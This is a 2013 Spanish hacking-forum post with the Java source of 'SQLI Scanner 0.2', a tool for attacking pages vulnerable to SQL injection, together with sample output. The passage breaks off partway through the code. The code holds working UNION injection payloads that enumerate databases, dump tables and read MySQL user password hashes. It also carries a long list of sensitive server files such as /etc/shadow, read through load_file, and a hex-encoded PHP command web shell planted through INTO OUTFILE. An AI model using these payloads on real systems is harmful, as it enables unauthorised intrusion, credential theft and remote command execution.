elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  Java
| | | |-+  [Java] SQLI Scanner 0.2		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Java] SQLI Scanner 0.2  (Leído 2,947 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Java] SQLI Scanner 0.2
« en: 22 Enero 2013, 01:34 am »
Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

Un ejemplo de uso :

Código:

-- == SQLI Scanner 0.2 == --


[+] Page : 
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

-- == OPTIONS == --

--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit

[Option] :
10

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished




El codigo es el siguiente :

Código
  1. // -- == -- == -- == ---- ==
  2. // SQLI Scanner 0.2       ||
  3. // -- == -- == -- == ---- ==
  4. // (C) Doddy Hackman 2013 ||
  5. // -- == -- == -- == ---- == 
  6.  
  7. import java.util.Scanner;
  8. import java.io.*;
  9. import java.net.*;
  10.  
  11. import java.util.regex.Matcher;
  12. import java.util.regex.Pattern;
  13.  
  14. public class Main {
  15.  
  16.     public static void main(String[] args) throws Exception {
  17.  
  18.         String target;
  19.         Scanner host = new Scanner(System.in);
  20.  
  21.         installer();
  22.  
  23.         System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
  24.         System.out.println("[+] Page : ");
  25.         target = host.nextLine();
  26.         scan(target);
  27.  
  28. //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  29. //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
  30. //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  31. //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
  32. //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
  33. //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  34. //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
  35. //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  36. //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
  37. //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");
  38.  
  39.     }
  40.  
  41.     private static void manejo(String urla) throws Exception {
  42.  
  43.         while (true) {
  44.             System.out.println("\n-- == OPTIONS == --\n");
  45.             System.out.println("--== information_schema.tables ==--");
  46.             System.out.println("[1] : Show tables");
  47.             System.out.println("[2] : Show columns");
  48.             System.out.println("[3] : Show DBS");
  49.             System.out.println("[4] : Show tables with other DB");
  50.             System.out.println("[5] : Show columns with other DB");
  51.             System.out.println("--== mysql.user ==--");
  52.             System.out.println("[6] : Show users");
  53.             System.out.println("--== Others ==--");
  54.             System.out.println("[7] : Fuzzing files with load_file");
  55.             System.out.println("[8] : Read a file with load_file");
  56.             System.out.println("[9] : Dump");
  57.             System.out.println("[10] : Informacion of the server");
  58.             System.out.println("[11] : Create a shell with into outfile");
  59.             System.out.println("[12] : Show Log");
  60.             System.out.println("[13] : Exit");
  61.  
  62.             int op;
  63.             Scanner host = new Scanner(System.in);
  64.             System.out.println("\n[Option] :");
  65.             op = host.nextInt();
  66.  
  67.             if (op == 1) {
  68.                 schematables(urla);
  69.                 continuar();
  70.             } else if (op == 2) {
  71.  
  72.                 String coler;
  73.  
  74.                 Scanner a = new Scanner(System.in);
  75.                 System.out.println("\n[+] Table : ");
  76.                 coler = a.nextLine();
  77.  
  78.                 schemacolumns(urla, coler);
  79.                 continuar();
  80.  
  81.             } else if (op == 3) {
  82.                 getdbs(urla);
  83.                 continuar();
  84.             } else if (op == 4) {
  85.  
  86.                 String tabler;
  87.  
  88.                 Scanner a = new Scanner(System.in);
  89.                 System.out.println("\n[+] DB : ");
  90.                 tabler = a.nextLine();
  91.  
  92.                 getablesbydb(urla, tabler);
  93.                 continuar();
  94.  
  95.             } else if (op == 5) {
  96.  
  97.                 String dber;
  98.                 String tablerx;
  99.  
  100.                 Scanner a = new Scanner(System.in);
  101.                 System.out.println("\n[+] DB : ");
  102.                 dber = a.nextLine();
  103.  
  104.                 Scanner b = new Scanner(System.in);
  105.                 System.out.println("\n[+] Table : ");
  106.                 tablerx = a.nextLine();
  107.  
  108.                 getcolbydb(urla, dber, tablerx);
  109.                 continuar();
  110.  
  111.             } else if (op == 6) {
  112.  
  113.                 mysqluser(urla);
  114.                 continuar();
  115.  
  116.             } else if (op == 7) {
  117.  
  118.                 fuzzfiles(urla);
  119.                 continuar();
  120.  
  121.             } else if (op == 8) {
  122.  
  123.                 String ar;
  124.  
  125.                 Scanner f = new Scanner(System.in);
  126.                 System.out.println("\n[+] File : ");
  127.                 ar = f.nextLine();
  128.  
  129.                 openfile(urla, ar);
  130.                 continuar();
  131.  
  132.             } else if (op == 9) {
  133.  
  134.                 String a;
  135.                 String b;
  136.                 String c;
  137.  
  138.                 Scanner m = new Scanner(System.in);
  139.                 System.out.println("\n[+] Table : ");
  140.                 a = m.nextLine();
  141.  
  142.                 Scanner n = new Scanner(System.in);
  143.                 System.out.println("\n[+] Column 1 : ");
  144.                 b = n.nextLine();
  145.  
  146.                 Scanner l = new Scanner(System.in);
  147.                 System.out.println("\n[+] Column 2 : ");
  148.                 c = l.nextLine();
  149.  
  150.                 dumper(urla, a, b, c);
  151.  
  152.                 continuar();
  153.  
  154.             } else if (op == 10) {
  155.  
  156.                 details(urla);
  157.                 continuar();
  158.  
  159.             } else if (op == 11) {
  160.  
  161.                 String b;
  162.                 String c;
  163.  
  164.                 Scanner m = new Scanner(System.in);
  165.                 System.out.println("\n[+] Full Path Discloure : ");
  166.                 b = m.nextLine();
  167.  
  168.                 Scanner n = new Scanner(System.in);
  169.                 System.out.println("\n[+] Directory to test : ");
  170.                 c = n.nextLine();
  171.  
  172.                 intofile(urla, b, c);
  173.                 continuar();
  174.  
  175.             } else if (op == 12) {
  176.  
  177.                 String ruta;
  178.  
  179.                 URL h = new URL(urla);
  180.  
  181.                 ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";
  182.  
  183.                 System.out.println("\n[+] Check logs in : " + ruta);
  184.                 continuar();
  185.  
  186.             } else if (op == 13) {
  187.                 System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
  188.                 continuar();
  189.                 System.exit(1);
  190.             } else {
  191.                 System.out.println("\n[-] Bad Option\n");
  192.                 continuar();
  193.             }
  194.  
  195.         }
  196.     }
  197.  
  198.     private static void continuar() throws Exception {
  199.         System.out.println("\n[+] Finished\n");
  200.         Scanner chau = new Scanner(System.in);
  201.         chau.nextLine();
  202.     }
  203.  
  204.     private static void installer() throws Exception {
  205.  
  206.         File crear = new File("logs");
  207.  
  208.         if (!crear.isDirectory()) {
  209.             crear.mkdirs();
  210.         }
  211.  
  212.     }
  213.  
  214.     private static void intofile(String urla, String fpd, String dir) throws Exception {
  215.  
  216.         String linea;
  217.         String lugar;
  218.         String lugardos;
  219.         String webtest;
  220.         String web1;
  221.         String formandoweb;
  222.         String code;
  223.  
  224.         linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
  225.         lugar = fpd + "/cmd.php";
  226.         lugardos = dir + "/cmd.php";
  227.  
  228.         URL h = new URL(urla);
  229.  
  230.         System.out.println("\n[+] Checking ...\n");
  231.  
  232.         webtest = "http://" + h.getHost() + lugardos;
  233.         Pattern uno = null;
  234.         Matcher dos = null;
  235.  
  236.         web1 = urla.replace("hackman", linea);
  237.         formandoweb = web1 + "+into+outfile+'" + lugar + "'--";
  238.  
  239.         code = toma(formandoweb);
  240.         code = toma(webtest);
  241.  
  242.         uno = Pattern.compile("Mini Shell By Doddy");
  243.         dos = uno.matcher(code);
  244.  
  245.         if (dos.find()) {
  246.             System.out.println("[Shell UP] : " + webtest);
  247.             savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
  248.         } else {
  249.             System.out.println("[-] Error");
  250.         }
  251.  
  252.     }
  253.  
  254.     private static void openfile(String urla, String file) throws Exception {
  255.  
  256.         String archivo;
  257.         String web1;
  258.         String code;
  259.  
  260.         Pattern uno = null;
  261.         Matcher dos = null;
  262.  
  263.         archivo = encodehex(file);
  264.  
  265.         web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
  266.  
  267.         System.out.println("\n[+] Reading ...\n");
  268.  
  269.         code = toma(web1);
  270.  
  271.         uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
  272.         dos = uno.matcher(code);
  273.  
  274.         if (dos.find()) {
  275.  
  276.             System.out.println("[+] File Found : " + file);
  277.             System.out.println("\n[Source Start]\n");
  278.             System.out.println(dos.group(1));
  279.             System.out.println("\n[Source End]\n");
  280.  
  281.             savefile(urla, "\r\n" + "[+] File Found : " + file);
  282.             savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
  283.             savefile(urla, dos.group(1));
  284.             savefile(urla, "\r\n" + "[Source End]" + "\r\n");
  285.  
  286.         } else {
  287.             System.out.println("[-] Not Found");
  288.         }
  289.  
  290.     }
  291.  
  292.     private static void fuzzfiles(String urla) throws Exception {
  293.  
  294.         String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
  295.         String archivo;
  296.         String web1;
  297.         String code;
  298.  
  299.         Pattern uno = null;
  300.         Matcher dos = null;
  301.  
  302.         System.out.println("\n[+] Searching files with load_file() ....\n");
  303.  
  304.         for (int count = 0; count < archivos.length; count++) {
  305.  
  306.             archivo = encodehex(archivos[count]);
  307.  
  308.             web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
  309.  
  310.             code = toma(web1);
  311.  
  312.             uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
  313.             dos = uno.matcher(code);
  314.  
  315.             if (dos.find()) {
  316.  
  317.                 System.out.println("[+] File Found : " + archivos[count]);
  318.                 System.out.println("\n[Source Start]\n");
  319.                 System.out.println(dos.group(1));
  320.                 System.out.println("\n[Source End]\n");
  321.  
  322.                 savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
  323.                 savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
  324.                 savefile(urla, dos.group(1));
  325.                 savefile(urla, "\r\n" + "[Source End]" + "\r\n");
  326.  
  327.             }
  328.  
  329.         }
  330.  
  331.     }
  332.  
  333.     private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {
  334.  
  335.         String web1;
  336.         String web2;
  337.         String code;
  338.         int x;
  339.  
  340.         Pattern uno = null;
  341.         Matcher dos = null;
  342.  
  343.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  344.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");
  345.  
  346.         code = toma(web1 + "+from+" + tabla + "--");
  347.  
  348.         System.out.println("\n[+] Getting Values ...");
  349.  
  350.         uno = Pattern.compile("K0BRA(.*?)K0BRA");
  351.         dos = uno.matcher(code);
  352.  
  353.         if (dos.find()) {
  354.             System.out.println("\n[+] Values Founds : " + dos.group(1));
  355.             savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");
  356.  
  357.             int finals = Integer.parseInt(dos.group(1));
  358.  
  359.             for (x = 0; x <= finals; x = x + 1) {
  360.  
  361.                 code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");
  362.  
  363.                 uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
  364.                 dos = uno.matcher(code);
  365.  
  366.                 if (dos.find()) {
  367.                     System.out.println("\n[+] " + col1 + " : " + dos.group(1));
  368.                     System.out.println("[+] " + col2 + " : " + dos.group(2));
  369.  
  370.                     savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
  371.                     savefile(urla, "[+] " + col2 + " : " + dos.group(2));
  372.  
  373.                 }
  374.  
  375.             }
  376.  
  377.         } else {
  378.             System.out.println("[-] Not Found");
  379.         }
  380.  
  381.     }
  382.  
  383.     private static void mysqluser(String urla) throws Exception {
  384.  
  385.         String web1;
  386.         String web2;
  387.         String code;
  388.         int x;
  389.  
  390.         Pattern uno = null;
  391.         Matcher dos = null;
  392.  
  393.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  394.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");
  395.  
  396.         System.out.println("\n[+] Searching mysql.user ....");
  397.  
  398.         code = toma(web1 + "+from+mysql.user--");
  399.  
  400.         uno = Pattern.compile("K0BRA(.*)K0BRA");
  401.         dos = uno.matcher(code);
  402.  
  403.         if (dos.find()) {
  404.             System.out.println("\n[+] Users Found : " + dos.group(1));
  405.  
  406.             savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");
  407.  
  408.             int finals = Integer.parseInt(dos.group(1));
  409.  
  410.             for (x = 0; x <= finals; x = x + 1) {
  411.  
  412.                 code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");
  413.  
  414.                 uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
  415.                 dos = uno.matcher(code);
  416.  
  417.                 if (dos.find()) {
  418.                     System.out.println("\n[+] Host : " + dos.group(1));
  419.                     System.out.println("[+] Username : " + dos.group(2));
  420.                     System.out.println("[+] Password : " + dos.group(3));
  421.  
  422.                     savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
  423.                     savefile(urla, "[+] Username : " + dos.group(2));
  424.                     savefile(urla, "[+] Password : " + dos.group(3));
  425.  
  426.                 }
  427.  
  428.             }
  429.  
  430.         } else {
  431.             System.out.println("[-] Not Found");
  432.         }
  433.  
  434.     }
  435.  
  436.     private static void getcolbydb(String urla, String db, String tab) throws Exception {
  437.  
  438.         String web1;
  439.         String web2;
  440.         String code;
  441.  
  442.         String dbf;
  443.         String table;
  444.  
  445.         int x;
  446.  
  447.         Pattern uno = null;
  448.         Matcher dos = null;
  449.  
  450.         dbf = encodehex(db);
  451.         table = encodehex(tab);
  452.  
  453.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  454.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
  455.  
  456.         System.out.println("\n[+] Getting Columns ....");
  457.  
  458.         code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");
  459.  
  460.         uno = Pattern.compile("K0BRA(.*)K0BRA");
  461.         dos = uno.matcher(code);
  462.  
  463.         if (dos.find()) {
  464.             System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");
  465.  
  466.             savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");
  467.  
  468.             int finals = Integer.parseInt(dos.group(1));
  469.  
  470.             for (x = 0; x <= finals; x = x + 1) {
  471.  
  472.                 code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");
  473.  
  474.                 uno = Pattern.compile("K0BRA(.*)K0BRA");
  475.                 dos = uno.matcher(code);
  476.  
  477.                 if (dos.find()) {
  478.                     System.out.println("[+] Column Found : " + dos.group(1));
  479.                     savefile(urla, "[+] Column Found : " + dos.group(1));
  480.                 }
  481.  
  482.             }
  483.  
  484.         } else {
  485.             System.out.println("[-] Not Found");
  486.         }
  487.  
  488.  
  489.     }
  490.  
  491.     private static void getablesbydb(String urla, String db) throws Exception {
  492.  
  493.         String web1;
  494.         String web2;
  495.         String code;
  496.         String data;
  497.         int x;
  498.         Pattern uno = null;
  499.         Matcher dos = null;
  500.  
  501.         data = encodehex(db);
  502.  
  503.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  504.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
  505.  
  506.         System.out.println("\n[+] Getting Tables ....");
  507.  
  508.         code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");
  509.  
  510.         uno = Pattern.compile("K0BRA(.*)K0BRA");
  511.         dos = uno.matcher(code);
  512.  
  513.         if (dos.find()) {
  514.             System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
  515.             savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");
  516.  
  517.             int finals = Integer.parseInt(dos.group(1));
  518.  
  519.             for (x = 0; x <= finals; x = x + 1) {
  520.  
  521.                 code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");
  522.  
  523.                 uno = Pattern.compile("K0BRA(.*)K0BRA");
  524.                 dos = uno.matcher(code);
  525.  
  526.                 if (dos.find()) {
  527.                     System.out.println("[+] Table Found : " + dos.group(1));
  528.                     savefile(urla, "[+] Table Found : " + dos.group(1));
  529.                 }
  530.  
  531.             }
  532.  
  533.         } else {
  534.             System.out.println("[-] Not Found");
  535.         }
  536.  
  537.  
  538.     }
  539.  
  540.     private static void getdbs(String urla) throws Exception {
  541.  
  542.         String web1;
  543.         String web2;
  544.         String code;
  545.         int x;
  546.         Pattern uno = null;
  547.         Matcher dos = null;
  548.  
  549.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  550.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");
  551.  
  552.         System.out.println("\n[+] Getting DBS ....");
  553.  
  554.         code = toma(web1 + "+from+information_schema.schemata--");
  555.  
  556.         uno = Pattern.compile("K0BRA(.*)K0BRA");
  557.         dos = uno.matcher(code);
  558.  
  559.         if (dos.find()) {
  560.             System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");
  561.  
  562.             savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");
  563.  
  564.             int finals = Integer.parseInt(dos.group(1));
  565.  
  566.             for (x = 0; x <= finals; x = x + 1) {
  567.  
  568.                 code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");
  569.  
  570.                 uno = Pattern.compile("K0BRA(.*)K0BRA");
  571.                 dos = uno.matcher(code);
  572.  
  573.                 if (dos.find()) {
  574.                     System.out.println("[+] DB Found : " + dos.group(1));
  575.                     savefile(urla, "[+] DB Found : " + dos.group(1));
  576.                 }
  577.  
  578.             }
  579.  
  580.         } else {
  581.             System.out.println("[-] Not Found");
  582.         }
  583.  
  584.     }
  585.  
  586.     private static void schemacolumns(String urla, String nombre) throws Exception {
  587.  
  588.         String web1;
  589.         String web2;
  590.         String code;
  591.         String tablexa;
  592.         int x;
  593.         Pattern uno = null;
  594.         Matcher dos = null;
  595.  
  596.         tablexa = encodehex(nombre);
  597.  
  598.         web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
  599.         web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
  600.  
  601.         System.out.println("\n[+] Getting columns ....");
  602.  
  603.         code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");
  604.  
  605.         uno = Pattern.compile("K0BRA(.*)K0BRA");
  606.         dos = uno.matcher(code);
  607.  
  608.         if (dos.find()) {
  609.             System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");
  610.  
  611.             savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");
  612.  
  613.             int finals = Integer.parseInt(dos.group(1));
